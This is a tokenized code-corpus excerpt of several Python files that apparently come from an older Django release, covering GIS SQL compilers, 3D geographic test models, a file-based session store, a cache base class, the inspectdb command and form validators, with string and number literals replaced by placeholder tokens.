row [ index_start : ] , fields ) : <EOL> values . append ( self . query . convert_values ( value , field , self . connection ) ) <EOL> else : <EOL> values . extend ( row [ index_start : ] ) <EOL> return tuple ( values ) <EOL> def get_extra_select_format ( self , alias ) : <EOL> sel_fmt = '<STR_LIT:%s>' <EOL> if hasattr ( self . query , '<STR_LIT>' ) and alias in self . query . custom_select : <EOL> sel_fmt = sel_fmt % self . query . custom_select [ alias ] <EOL> return sel_fmt <EOL> def get_field_select ( self , field , alias = None , column = None ) : <EOL> """<STR_LIT>""" <EOL> sel_fmt = self . get_select_format ( field ) <EOL> if field in self . query . custom_select : <EOL> field_sel = sel_fmt % self . query . custom_select [ field ] <EOL> else : <EOL> field_sel = sel_fmt % self . _field_column ( field , alias , column ) <EOL> return field_sel <EOL> def get_select_format ( self , fld ) : <EOL> """<STR_LIT>""" <EOL> if self . connection . ops . select and hasattr ( fld , '<STR_LIT>' ) : <EOL> sel_fmt = self . connection . ops . select <EOL> if self . query . transformed_srid and ( self . connection . ops . oracle or <EOL> self . connection . ops . spatialite ) : <EOL> sel_fmt = "<STR_LIT>" % ( self . query . transformed_srid , sel_fmt ) <EOL> else : <EOL> sel_fmt = '<STR_LIT:%s>' <EOL> return sel_fmt <EOL> def _field_column ( self , field , table_alias = None , column = None ) : <EOL> """<STR_LIT>""" <EOL> if table_alias is None : table_alias = self . query . model . _meta . db_table <EOL> return "<STR_LIT>" % ( self . quote_name_unless_alias ( table_alias ) , <EOL> self . connection . ops . quote_name ( column or field . column ) ) <EOL> class SQLInsertCompiler ( compiler . SQLInsertCompiler , GeoSQLCompiler ) : <EOL> pass <EOL> class SQLDeleteCompiler ( compiler . SQLDeleteCompiler , GeoSQLCompiler ) : <EOL> pass <EOL> class SQLUpdateCompiler ( compiler . SQLUpdateCompiler , GeoSQLCompiler ) : <EOL> pass <EOL> class SQLAggregateCompiler ( compiler . SQLAggregateCompiler , GeoSQLCompiler ) : <EOL> pass <EOL> class SQLDateCompiler ( compiler . SQLDateCompiler , GeoSQLCompiler ) : <EOL> """<STR_LIT>""" <EOL> def results_iter ( self ) : <EOL> if self . connection . ops . oracle : <EOL> from django . db . models . fields import DateTimeField <EOL> fields = [ DateTimeField ( ) ] <EOL> else : <EOL> needs_string_cast = self . connection . features . needs_datetime_string_cast <EOL> offset = len ( self . query . extra_select ) <EOL> for rows in self . execute_sql ( MULTI ) : <EOL> for row in rows : <EOL> date = row [ offset ] <EOL> if self . connection . ops . oracle : <EOL> date = self . resolve_columns ( row , fields ) [ offset ] <EOL> elif needs_string_cast : <EOL> date = typecast_timestamp ( str ( date ) ) <EOL> yield date </s>
<s> from django . conf import settings <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> from django . utils . importlib import import_module <EOL> geom_backend = getattr ( settings , '<STR_LIT>' , '<STR_LIT>' ) <EOL> try : <EOL> module = import_module ( '<STR_LIT>' % geom_backend , '<STR_LIT>' ) <EOL> except ImportError : <EOL> try : <EOL> module = import_module ( geom_backend ) <EOL> except ImportError : <EOL> raise ImproperlyConfigured ( '<STR_LIT>' <EOL> '<STR_LIT>' % geom_backend ) <EOL> try : <EOL> Geometry = module . Geometry <EOL> GeometryException = module . GeometryException <EOL> except AttributeError : <EOL> raise ImproperlyConfigured ( '<STR_LIT>' <EOL> '<STR_LIT>' % geom_backend ) </s>
<s> from django . contrib . gis . db import models <EOL> from django . utils . encoding import python_2_unicode_compatible <EOL> @ python_2_unicode_compatible <EOL> class City3D ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:30> ) <EOL> point = models . PointField ( dim = <NUM_LIT:3> ) <EOL> objects = models . GeoManager ( ) <EOL> def __str__ ( self ) : <EOL> return self . name <EOL> @ python_2_unicode_compatible <EOL> class Interstate2D ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:30> ) <EOL> line = models . LineStringField ( srid = <NUM_LIT> ) <EOL> objects = models . GeoManager ( ) <EOL> def __str__ ( self ) : <EOL> return self . name <EOL> @ python_2_unicode_compatible <EOL> class Interstate3D ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:30> ) <EOL> line = models . LineStringField ( dim = <NUM_LIT:3> , srid = <NUM_LIT> ) <EOL> objects = models . GeoManager ( ) <EOL> def __str__ ( self ) : <EOL> return self . name <EOL> @ python_2_unicode_compatible <EOL> class InterstateProj2D ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:30> ) <EOL> line = models . LineStringField ( srid = <NUM_LIT> ) <EOL> objects = models . GeoManager ( ) <EOL> def __str__ ( self ) : <EOL> return self . name <EOL> @ python_2_unicode_compatible <EOL> class InterstateProj3D ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:30> ) <EOL> line = models . LineStringField ( dim = <NUM_LIT:3> , srid = <NUM_LIT> ) <EOL> objects = models . GeoManager ( ) <EOL> def __str__ ( self ) : <EOL> return self . name <EOL> @ python_2_unicode_compatible <EOL> class Polygon2D ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:30> ) <EOL> poly = models . PolygonField ( srid = <NUM_LIT> ) <EOL> objects = models . GeoManager ( ) <EOL> def __str__ ( self ) : <EOL> return self . name <EOL> @ python_2_unicode_compatible <EOL> class Polygon3D ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:30> ) <EOL> poly = models . PolygonField ( dim = <NUM_LIT:3> , srid = <NUM_LIT> ) <EOL> objects = models . GeoManager ( ) <EOL> def __str__ ( self ) : <EOL> return self . name <EOL> class Point2D ( models . Model ) : <EOL> point = models . PointField ( ) <EOL> objects = models . GeoManager ( ) <EOL> class Point3D ( models . Model ) : <EOL> point = models . PointField ( dim = <NUM_LIT:3> ) <EOL> objects = models . GeoManager ( ) <EOL> class MultiPoint3D ( models . Model ) : <EOL> mpoint = models . MultiPointField ( dim = <NUM_LIT:3> ) <EOL> objects = models . GeoManager ( ) </s>
<s> import warnings <EOL> warnings . warn ( "<STR_LIT>" , DeprecationWarning ) </s>
<s> import datetime <EOL> import errno <EOL> import os <EOL> import tempfile <EOL> from django . conf import settings <EOL> from django . contrib . sessions . backends . base import SessionBase , CreateError , VALID_KEY_CHARS <EOL> from django . core . exceptions import SuspiciousOperation , ImproperlyConfigured <EOL> from django . utils import timezone <EOL> class SessionStore ( SessionBase ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , session_key = None ) : <EOL> self . storage_path = type ( self ) . _get_storage_path ( ) <EOL> self . file_prefix = settings . SESSION_COOKIE_NAME <EOL> super ( SessionStore , self ) . __init__ ( session_key ) <EOL> @ classmethod <EOL> def _get_storage_path ( cls ) : <EOL> try : <EOL> return cls . _storage_path <EOL> except AttributeError : <EOL> storage_path = getattr ( settings , "<STR_LIT>" , None ) <EOL> if not storage_path : <EOL> storage_path = tempfile . gettempdir ( ) <EOL> if not os . path . isdir ( storage_path ) : <EOL> raise ImproperlyConfigured ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % storage_path ) <EOL> cls . _storage_path = storage_path <EOL> return storage_path <EOL> def _key_to_file ( self , session_key = None ) : <EOL> """<STR_LIT>""" <EOL> if session_key is None : <EOL> session_key = self . _get_or_create_session_key ( ) <EOL> if not set ( session_key ) . issubset ( set ( VALID_KEY_CHARS ) ) : <EOL> raise SuspiciousOperation ( <EOL> "<STR_LIT>" ) <EOL> return os . path . join ( self . storage_path , self . file_prefix + session_key ) <EOL> def _last_modification ( self ) : <EOL> """<STR_LIT>""" <EOL> modification = os . stat ( self . _key_to_file ( ) ) . st_mtime <EOL> if settings . USE_TZ : <EOL> modification = datetime . datetime . utcfromtimestamp ( modification ) <EOL> modification = modification . replace ( tzinfo = timezone . utc ) <EOL> else : <EOL> modification = datetime . datetime . fromtimestamp ( modification ) <EOL> return modification <EOL> def load ( self ) : <EOL> session_data = { } <EOL> try : <EOL> with open ( self . _key_to_file ( ) , "<STR_LIT:rb>" ) as session_file : <EOL> file_data = session_file . read ( ) <EOL> if file_data : <EOL> try : <EOL> session_data = self . decode ( file_data ) <EOL> except ( EOFError , SuspiciousOperation ) : <EOL> self . create ( ) <EOL> expiry_age = self . get_expiry_age ( <EOL> modification = self . _last_modification ( ) , <EOL> expiry = session_data . get ( '<STR_LIT>' ) ) <EOL> if expiry_age < <NUM_LIT:0> : <EOL> session_data = { } <EOL> self . delete ( ) <EOL> self . create ( ) <EOL> except IOError : <EOL> self . create ( ) <EOL> return session_data <EOL> def create ( self ) : <EOL> while True : <EOL> self . _session_key = self . _get_new_session_key ( ) <EOL> try : <EOL> self . save ( must_create = True ) <EOL> except CreateError : <EOL> continue <EOL> self . modified = True <EOL> self . _session_cache = { } <EOL> return <EOL> def save ( self , must_create = False ) : <EOL> session_data = self . _get_session ( no_load = must_create ) <EOL> session_file_name = self . _key_to_file ( ) <EOL> try : <EOL> flags = os . O_WRONLY | os . O_CREAT | getattr ( os , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> if must_create : <EOL> flags |= os . O_EXCL <EOL> fd = os . open ( session_file_name , flags ) <EOL> os . close ( fd ) <EOL> except OSError as e : <EOL> if must_create and e . errno == errno . EEXIST : <EOL> raise CreateError <EOL> raise <EOL> dir , prefix = os . path . split ( session_file_name ) <EOL> try : <EOL> output_file_fd , output_file_name = tempfile . mkstemp ( dir = dir , <EOL> prefix = prefix + '<STR_LIT>' ) <EOL> renamed = False <EOL> try : <EOL> try : <EOL> os . write ( output_file_fd , self . encode ( session_data ) . encode ( ) ) <EOL> finally : <EOL> os . close ( output_file_fd ) <EOL> os . rename ( output_file_name , session_file_name ) <EOL> renamed = True <EOL> finally : <EOL> if not renamed : <EOL> os . unlink ( output_file_name ) <EOL> except ( OSError , IOError , EOFError ) : <EOL> pass <EOL> def exists ( self , session_key ) : <EOL> return os . path . exists ( self . _key_to_file ( session_key ) ) <EOL> def delete ( self , session_key = None ) : <EOL> if session_key is None : <EOL> if self . session_key is None : <EOL> return <EOL> session_key = self . session_key <EOL> try : <EOL> os . unlink ( self . _key_to_file ( session_key ) ) <EOL> except OSError : <EOL> pass <EOL> def clean ( self ) : <EOL> pass <EOL> @ classmethod <EOL> def clear_expired ( cls ) : <EOL> storage_path = cls . _get_storage_path ( ) <EOL> file_prefix = settings . SESSION_COOKIE_NAME <EOL> for session_file in os . listdir ( storage_path ) : <EOL> if not session_file . startswith ( file_prefix ) : <EOL> continue <EOL> session_key = session_file [ len ( file_prefix ) : ] <EOL> session = cls ( session_key ) <EOL> session . create = lambda : None <EOL> session . load ( ) </s>
<s> "<STR_LIT>" <EOL> from __future__ import unicode_literals <EOL> import warnings <EOL> from django . core . exceptions import ImproperlyConfigured , DjangoRuntimeWarning <EOL> from django . utils . importlib import import_module <EOL> class InvalidCacheBackendError ( ImproperlyConfigured ) : <EOL> pass <EOL> class CacheKeyWarning ( DjangoRuntimeWarning ) : <EOL> pass <EOL> MEMCACHE_MAX_KEY_LENGTH = <NUM_LIT> <EOL> def default_key_func ( key , key_prefix , version ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' % ( key_prefix , version , key ) <EOL> def get_key_func ( key_func ) : <EOL> """<STR_LIT>""" <EOL> if key_func is not None : <EOL> if callable ( key_func ) : <EOL> return key_func <EOL> else : <EOL> key_func_module_path , key_func_name = key_func . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> key_func_module = import_module ( key_func_module_path ) <EOL> return getattr ( key_func_module , key_func_name ) <EOL> return default_key_func <EOL> class BaseCache ( object ) : <EOL> def __init__ ( self , params ) : <EOL> timeout = params . get ( '<STR_LIT>' , params . get ( '<STR_LIT>' , <NUM_LIT> ) ) <EOL> try : <EOL> timeout = int ( timeout ) <EOL> except ( ValueError , TypeError ) : <EOL> timeout = <NUM_LIT> <EOL> self . default_timeout = timeout <EOL> options = params . get ( '<STR_LIT>' , { } ) <EOL> max_entries = params . get ( '<STR_LIT>' , options . get ( '<STR_LIT>' , <NUM_LIT> ) ) <EOL> try : <EOL> self . _max_entries = int ( max_entries ) <EOL> except ( ValueError , TypeError ) : <EOL> self . _max_entries = <NUM_LIT> <EOL> cull_frequency = params . get ( '<STR_LIT>' , options . get ( '<STR_LIT>' , <NUM_LIT:3> ) ) <EOL> try : <EOL> self . _cull_frequency = int ( cull_frequency ) <EOL> except ( ValueError , TypeError ) : <EOL> self . _cull_frequency = <NUM_LIT:3> <EOL> self . key_prefix = params . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . version = params . get ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> self . key_func = get_key_func ( params . get ( '<STR_LIT>' , None ) ) <EOL> def make_key ( self , key , version = None ) : <EOL> """<STR_LIT>""" <EOL> if version is None : <EOL> version = self . version <EOL> new_key = self . key_func ( key , self . key_prefix , version ) <EOL> return new_key <EOL> def add ( self , key , value , timeout = None , version = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def get ( self , key , default = None , version = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def set ( self , key , value , timeout = None , version = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def delete ( self , key , version = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def get_many ( self , keys , version = None ) : <EOL> """<STR_LIT>""" <EOL> d = { } <EOL> for k in keys : <EOL> val = self . get ( k , version = version ) <EOL> if val is not None : <EOL> d [ k ] = val <EOL> return d <EOL> def has_key ( self , key , version = None ) : <EOL> """<STR_LIT>""" <EOL> return self . get ( key , version = version ) is not None <EOL> def incr ( self , key , delta = <NUM_LIT:1> , version = None ) : <EOL> """<STR_LIT>""" <EOL> value = self . get ( key , version = version ) <EOL> if value is None : <EOL> raise ValueError ( "<STR_LIT>" % key ) <EOL> new_value = value + delta <EOL> self . set ( key , new_value , version = version ) <EOL> return new_value <EOL> def decr ( self , key , delta = <NUM_LIT:1> , version = None ) : <EOL> """<STR_LIT>""" <EOL> return self . incr ( key , - delta , version = version ) <EOL> def __contains__ ( self , key ) : <EOL> """<STR_LIT>""" <EOL> return self . has_key ( key ) <EOL> def set_many ( self , data , timeout = None , version = None ) : <EOL> """<STR_LIT>""" <EOL> for key , value in data . items ( ) : <EOL> self . set ( key , value , timeout = timeout , version = version ) <EOL> def delete_many ( self , keys , version = None ) : <EOL> """<STR_LIT>""" <EOL> for key in keys : <EOL> self . delete ( key , version = version ) <EOL> def clear ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def validate_key ( self , key ) : <EOL> """<STR_LIT>""" <EOL> if len ( key ) > MEMCACHE_MAX_KEY_LENGTH : <EOL> warnings . warn ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( key , MEMCACHE_MAX_KEY_LENGTH ) , <EOL> CacheKeyWarning ) <EOL> for char in key : <EOL> if ord ( char ) < <NUM_LIT> or ord ( char ) == <NUM_LIT> : <EOL> warnings . warn ( '<STR_LIT>' <EOL> '<STR_LIT>' % key , <EOL> CacheKeyWarning ) <EOL> def incr_version ( self , key , delta = <NUM_LIT:1> , version = None ) : <EOL> """<STR_LIT>""" <EOL> if version is None : <EOL> version = self . version <EOL> value = self . get ( key , version = version ) <EOL> if value is None : <EOL> raise ValueError ( "<STR_LIT>" % key ) <EOL> self . set ( key , value , version = version + delta ) <EOL> self . delete ( key , version = version ) <EOL> return version + delta <EOL> def decr_version ( self , key , delta = <NUM_LIT:1> , version = None ) : <EOL> """<STR_LIT>""" <EOL> return self . incr_version ( key , - delta , version ) </s>
<s> from __future__ import unicode_literals <EOL> import keyword <EOL> import re <EOL> from optparse import make_option <EOL> from django . core . management . base import NoArgsCommand , CommandError <EOL> from django . db import connections , DEFAULT_DB_ALIAS <EOL> from django . utils import six <EOL> class Command ( NoArgsCommand ) : <EOL> help = "<STR_LIT>" <EOL> option_list = NoArgsCommand . option_list + ( <EOL> make_option ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , <EOL> default = DEFAULT_DB_ALIAS , help = '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> ) <EOL> requires_model_validation = False <EOL> db_module = '<STR_LIT>' <EOL> def handle_noargs ( self , ** options ) : <EOL> try : <EOL> for line in self . handle_inspection ( options ) : <EOL> self . stdout . write ( "<STR_LIT>" % line ) <EOL> except NotImplementedError : <EOL> raise CommandError ( "<STR_LIT>" ) <EOL> def handle_inspection ( self , options ) : <EOL> connection = connections [ options . get ( '<STR_LIT>' ) ] <EOL> table_name_filter = options . get ( '<STR_LIT>' ) <EOL> table2model = lambda table_name : table_name . title ( ) . replace ( '<STR_LIT:_>' , '<STR_LIT>' ) . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) . replace ( '<STR_LIT:->' , '<STR_LIT>' ) <EOL> strip_prefix = lambda s : s . startswith ( "<STR_LIT>" ) and s [ <NUM_LIT:1> : ] or s <EOL> cursor = connection . cursor ( ) <EOL> yield "<STR_LIT>" <EOL> yield "<STR_LIT>" <EOL> yield "<STR_LIT>" <EOL> yield "<STR_LIT>" <EOL> yield "<STR_LIT>" <EOL> yield "<STR_LIT:#>" <EOL> yield "<STR_LIT>" <EOL> yield "<STR_LIT>" <EOL> yield "<STR_LIT>" <EOL> yield '<STR_LIT>' <EOL> yield '<STR_LIT>' % self . db_module <EOL> yield '<STR_LIT>' <EOL> known_models = [ ] <EOL> for table_name in connection . introspection . table_names ( cursor ) : <EOL> if table_name_filter is not None and callable ( table_name_filter ) : <EOL> if not table_name_filter ( table_name ) : <EOL> continue <EOL> yield '<STR_LIT>' % table2model ( table_name ) <EOL> known_models . append ( table2model ( table_name ) ) <EOL> try : <EOL> relations = connection . introspection . get_relations ( cursor , table_name ) <EOL> except NotImplementedError : <EOL> relations = { } <EOL> try : <EOL> indexes = connection . introspection . get_indexes ( cursor , table_name ) <EOL> except NotImplementedError : <EOL> indexes = { } <EOL> used_column_names = [ ] <EOL> for i , row in enumerate ( connection . introspection . get_table_description ( cursor , table_name ) ) : <EOL> comment_notes = [ ] <EOL> extra_params = { } <EOL> column_name = row [ <NUM_LIT:0> ] <EOL> is_relation = i in relations <EOL> att_name , params , notes = self . normalize_col_name ( <EOL> column_name , used_column_names , is_relation ) <EOL> extra_params . update ( params ) <EOL> comment_notes . extend ( notes ) <EOL> used_column_names . append ( att_name ) <EOL> if column_name in indexes : <EOL> if indexes [ column_name ] [ '<STR_LIT:primary_key>' ] : <EOL> extra_params [ '<STR_LIT:primary_key>' ] = True <EOL> elif indexes [ column_name ] [ '<STR_LIT>' ] : <EOL> extra_params [ '<STR_LIT>' ] = True <EOL> if is_relation : <EOL> rel_to = relations [ i ] [ <NUM_LIT:1> ] == table_name and "<STR_LIT>" or table2model ( relations [ i ] [ <NUM_LIT:1> ] ) <EOL> if rel_to in known_models : <EOL> field_type = '<STR_LIT>' % rel_to <EOL> else : <EOL> field_type = "<STR_LIT>" % rel_to <EOL> else : <EOL> field_type , field_params , field_notes = self . get_field_type ( connection , table_name , row ) <EOL> extra_params . update ( field_params ) <EOL> comment_notes . extend ( field_notes ) <EOL> field_type += '<STR_LIT:(>' <EOL> if att_name == '<STR_LIT:id>' and field_type == '<STR_LIT>' and extra_params == { '<STR_LIT:primary_key>' : True } : <EOL> continue <EOL> if row [ <NUM_LIT:6> ] : <EOL> extra_params [ '<STR_LIT:blank>' ] = True <EOL> if not field_type in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> extra_params [ '<STR_LIT:null>' ] = True <EOL> field_desc = '<STR_LIT>' % ( att_name , field_type ) <EOL> if extra_params : <EOL> if not field_desc . endswith ( '<STR_LIT:(>' ) : <EOL> field_desc += '<STR_LIT:U+002CU+0020>' <EOL> field_desc += '<STR_LIT:U+002CU+0020>' . join ( [ <EOL> '<STR_LIT>' % ( k , strip_prefix ( repr ( v ) ) ) <EOL> for k , v in extra_params . items ( ) ] ) <EOL> field_desc += '<STR_LIT:)>' <EOL> if comment_notes : <EOL> field_desc += '<STR_LIT>' + '<STR_LIT:U+0020>' . join ( comment_notes ) <EOL> yield '<STR_LIT>' % field_desc <EOL> for meta_line in self . get_meta ( table_name ) : <EOL> yield meta_line <EOL> def normalize_col_name ( self , col_name , used_column_names , is_relation ) : <EOL> """<STR_LIT>""" <EOL> field_params = { } <EOL> field_notes = [ ] <EOL> new_name = col_name . lower ( ) <EOL> if new_name != col_name : <EOL> field_notes . append ( '<STR_LIT>' ) <EOL> if is_relation : <EOL> if new_name . endswith ( '<STR_LIT>' ) : <EOL> new_name = new_name [ : - <NUM_LIT:3> ] <EOL> else : <EOL> field_params [ '<STR_LIT>' ] = col_name <EOL> new_name , num_repl = re . subn ( r'<STR_LIT>' , '<STR_LIT:_>' , new_name ) <EOL> if num_repl > <NUM_LIT:0> : <EOL> field_notes . append ( '<STR_LIT>' ) <EOL> if new_name . find ( '<STR_LIT>' ) >= <NUM_LIT:0> : <EOL> while new_name . find ( '<STR_LIT>' ) >= <NUM_LIT:0> : <EOL> new_name = new_name . replace ( '<STR_LIT>' , '<STR_LIT:_>' ) <EOL> if col_name . lower ( ) . find ( '<STR_LIT>' ) >= <NUM_LIT:0> : <EOL> field_notes . append ( "<STR_LIT>" ) <EOL> if new_name . startswith ( '<STR_LIT:_>' ) : <EOL> new_name = '<STR_LIT>' % new_name <EOL> field_notes . append ( "<STR_LIT>" ) <EOL> if new_name . endswith ( '<STR_LIT:_>' ) : <EOL> new_name = '<STR_LIT>' % new_name <EOL> field_notes . append ( "<STR_LIT>" ) <EOL> if keyword . iskeyword ( new_name ) : <EOL> new_name += '<STR_LIT>' <EOL> field_notes . append ( '<STR_LIT>' ) <EOL> if new_name [ <NUM_LIT:0> ] . isdigit ( ) : <EOL> new_name = '<STR_LIT>' % new_name <EOL> field_notes . append ( "<STR_LIT>" ) <EOL> if new_name in used_column_names : <EOL> num = <NUM_LIT:0> <EOL> while '<STR_LIT>' % ( new_name , num ) in used_column_names : <EOL> num += <NUM_LIT:1> <EOL> new_name = '<STR_LIT>' % ( new_name , num ) <EOL> field_notes . append ( '<STR_LIT>' ) <EOL> if col_name != new_name and field_notes : <EOL> field_params [ '<STR_LIT>' ] = col_name <EOL> return new_name , field_params , field_notes <EOL> def get_field_type ( self , connection , table_name , row ) : <EOL> """<STR_LIT>""" <EOL> field_params = { } <EOL> field_notes = [ ] <EOL> try : <EOL> field_type = connection . introspection . get_field_type ( row [ <NUM_LIT:1> ] , row ) <EOL> except KeyError : <EOL> field_type = '<STR_LIT>' <EOL> field_notes . append ( '<STR_LIT>' ) <EOL> if type ( field_type ) is tuple : <EOL> field_type , new_params = field_type <EOL> field_params . update ( new_params ) <EOL> if field_type == '<STR_LIT>' and row [ <NUM_LIT:3> ] : <EOL> field_params [ '<STR_LIT:max_length>' ] = row [ <NUM_LIT:3> ] <EOL> if field_type == '<STR_LIT>' : <EOL> field_params [ '<STR_LIT>' ] = row [ <NUM_LIT:4> ] <EOL> field_params [ '<STR_LIT>' ] = row [ <NUM_LIT:5> ] <EOL> return field_type , field_params , field_notes <EOL> def get_meta ( self , table_name ) : <EOL> """<STR_LIT>""" <EOL> return [ "<STR_LIT>" , <EOL> "<STR_LIT>" % table_name , <EOL> "<STR_LIT>" ] </s>
<s> from __future__ import unicode_literals <EOL> import re <EOL> try : <EOL> from urllib . parse import urlsplit , urlunsplit <EOL> except ImportError : <EOL> from urlparse import urlsplit , urlunsplit <EOL> from django . core . exceptions import ValidationError <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . utils . encoding import force_text <EOL> from django . utils . ipv6 import is_valid_ipv6_address <EOL> from django . utils import six <EOL> EMPTY_VALUES = ( None , '<STR_LIT>' , [ ] , ( ) , { } ) <EOL> class RegexValidator ( object ) : <EOL> regex = '<STR_LIT>' <EOL> message = _ ( '<STR_LIT>' ) <EOL> code = '<STR_LIT>' <EOL> def __init__ ( self , regex = None , message = None , code = None ) : <EOL> if regex is not None : <EOL> self . regex = regex <EOL> if message is not None : <EOL> self . message = message <EOL> if code is not None : <EOL> self . code = code <EOL> if isinstance ( self . regex , six . string_types ) : <EOL> self . regex = re . compile ( self . regex ) <EOL> def __call__ ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if not self . regex . search ( force_text ( value ) ) : <EOL> raise ValidationError ( self . message , code = self . code ) <EOL> class URLValidator ( RegexValidator ) : <EOL> regex = re . compile ( <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' , re . IGNORECASE ) <EOL> def __call__ ( self , value ) : <EOL> try : <EOL> super ( URLValidator , self ) . __call__ ( value ) <EOL> except ValidationError as e : <EOL> if value : <EOL> value = force_text ( value ) <EOL> scheme , netloc , path , query , fragment = urlsplit ( value ) <EOL> try : <EOL> netloc = netloc . encode ( '<STR_LIT>' ) . decode ( '<STR_LIT:ascii>' ) <EOL> except UnicodeError : <EOL> raise e <EOL> url = urlunsplit ( ( scheme , netloc , path , query , fragment ) ) <EOL> super ( URLValidator , self ) . __call__ ( url ) <EOL> else : <EOL> raise <EOL> else : <EOL> url = value <EOL> def validate_integer ( value ) : <EOL> try : <EOL> int ( value ) <EOL> except ( ValueError , TypeError ) : <EOL> raise ValidationError ( '<STR_LIT>' ) <EOL> class EmailValidator ( RegexValidator ) : <EOL> def __call__ ( self , value ) : <EOL> try : <EOL> super ( EmailValidator , self ) . __call__ ( value ) <EOL> except ValidationError as e : <EOL> if value and '<STR_LIT:@>' in value : <EOL> parts = value . split ( '<STR_LIT:@>' ) <EOL> try : <EOL> parts [ - <NUM_LIT:1> ] = parts [ - <NUM_LIT:1> ] . encode ( '<STR_LIT>' ) . decode ( '<STR_LIT:ascii>' ) <EOL> except UnicodeError : <EOL> raise e <EOL> super ( EmailValidator , self ) . __call__ ( '<STR_LIT:@>' . join ( parts ) ) <EOL> else : <EOL> raise <EOL> email_re = re . compile ( <EOL> r"<STR_LIT>" <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' , re . IGNORECASE ) <EOL> validate_email = EmailValidator ( email_re , _ ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> slug_re = re . compile ( r'<STR_LIT>' ) <EOL> validate_slug = RegexValidator ( slug_re , _ ( "<STR_LIT>" ) , '<STR_LIT>' ) <EOL> ipv4_re = re . compile ( r'<STR_LIT>' ) <EOL> validate_ipv4_address = RegexValidator ( ipv4_re , _ ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> def validate_ipv6_address ( value ) : <EOL> if not is_valid_ipv6_address ( value ) : <EOL> raise ValidationError ( _ ( '<STR_LIT>' ) , code = '<STR_LIT>' ) <EOL> def validate_ipv46_address ( value ) : <EOL> try : <EOL> validate_ipv4_address ( value ) <EOL> except ValidationError : <EOL> try : <EOL> validate_ipv6_address ( value ) <EOL> except ValidationError : <EOL> raise ValidationError ( _ ( '<STR_LIT>' ) , code = '<STR_LIT>' ) <EOL> ip_address_validator_map = { <EOL> '<STR_LIT>' : ( [ validate_ipv46_address ] , _ ( '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : ( [ validate_ipv4_address ] , _ ( '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : ( [ validate_ipv6_address ] , _ ( '<STR_LIT>' ) ) , <EOL> } <EOL> def ip_address_validators ( protocol , unpack_ipv4 ) : <EOL> """<STR_LIT>""" <EOL> if protocol != '<STR_LIT>' and unpack_ipv4 : <EOL> raise ValueError ( <EOL> "<STR_LIT>" ) <EOL> try : <EOL> return ip_address_validator_map [ protocol . lower ( ) ] <EOL> except KeyError : <EOL> raise ValueError ( "<STR_LIT>" <EOL> % ( protocol , list ( ip_address_validator_map ) ) ) <EOL> comma_separated_int_list_re = re . compile ( '<STR_LIT>' ) <EOL> validate_comma_separated_integer_list = RegexValidator ( comma_separated_int_list_re , _ ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> class BaseValidator ( object ) : <EOL> compare = lambda self , a , b : a is not b <EOL> clean = lambda self , x : x <EOL> message = _ ( '<STR_LIT>' ) <EOL> code = '<STR_LIT>' <EOL> def __init__ ( self , limit_value ) : <EOL> self . limit_value = limit_value <EOL> def __call__ ( self , value ) : <EOL> cleaned = self . clean ( value ) <EOL> params = { '<STR_LIT>' : self . limit_value , '<STR_LIT>' : cleaned } <EOL> if self . compare ( cleaned , self . limit_value ) : <EOL> raise ValidationError ( <EOL> self . message % params , <EOL> code = self . code , <EOL> params = params , <EOL> ) <EOL> class MaxValueValidator ( BaseValidator ) : <EOL> compare = lambda self , a , b : a > b <EOL> message = _ ( '<STR_LIT>' ) <EOL> code = '<STR_LIT>' <EOL> class MinValueValidator ( BaseValidator ) : <EOL> compare = lambda self , a , b : a < b <EOL> message = _ ( '<STR_LIT>' ) <EOL> code = '<STR_LIT>' <EOL> class MinLengthValidator ( BaseValidator ) : <EOL> compare = lambda self , a , b : a < b <EOL> clean = lambda self , x : len ( x ) <EOL> message = _ ( '<STR_LIT>' ) <EOL> code = '<STR_LIT>' <EOL> class MaxLengthValidator ( BaseValidator ) : <EOL> compare = lambda self , a , b : a > b <EOL> clean = lambda self , x : len ( x ) <EOL> message = _ ( '<STR_LIT>' ) <EOL> code = '<STR_LIT:max_length>' </s>
